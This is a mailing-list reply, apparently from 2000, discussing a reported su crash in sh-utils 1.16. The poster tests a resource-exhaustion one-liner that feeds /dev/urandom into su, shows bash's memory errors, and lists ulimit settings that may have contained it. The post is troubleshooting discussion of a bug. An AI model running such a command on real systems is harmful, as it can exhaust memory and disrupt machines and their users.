Re: security probs with su (sh-utils 1.16)

On Fri, Mar 24, 2000 at 09:38:33PM -0700, Nathan Paul Simons wrote:
> 	Has anyone else seen this?  i tested it with the latest shellutils
> from the frozen dist, and it appears to work.  It should also be noted
> that i tested this on my alpha box (running RedHat 6.1) and it didn't do
> anything except give an error message.  The version included with RedHat
> 6.1 is sh-utils 2.0.  i haven't looked yet but, i'm willing to bet that
> this was already noticed and fixed and people (including distro
> maintainers) just need to upgrade.

I just tried this on my powerpc box (blue G3 400) with current frozen and
it did not crash my system.  I ran this command twice on two VCs they
ran for awhile and slowed stuff down a little (noticable if i say, did
ls -l /usr/bin) but after a minute or so bash killed the processes:

[eb@socrates eb]$ su `cat /dev/urandom` > /dev/null |< su `cat
/dev/urandom`&
[1] 7080
[eb@socrates eb]$ bash: xrealloc: cannot reallocate 16777216 bytes (0
bytes allocated)
bash: xrealloc: cannot reallocate 16777216 bytes (0 bytes allocated)

[1]+  Exit 2                  su `cat /dev/urandom` >/dev/null | `cat
/dev/urandom` <su
[eb@socrates eb]$

perhaps this is because i have resource limits set?

[eb@socrates eb]$ ulimit -a
core file size (blocks)     1000000
data seg size (kbytes)      102400
file size (blocks)          unlimited
max locked memory (kbytes)  5120
max memory size (kbytes)    46080
open files                  256
pipe size (512 bytes)       8
stack size (kbytes)         8192
cpu time (seconds)          63072000
max user processes          100
virtual memory (kbytes)     51200
[eb@socrates eb]$

this system has 128 MB of real ram and a 96MB swap partition.

as for redhat i think they use GNU su do they not?  we (and presumably
slack) are using the simple shadow su (why?).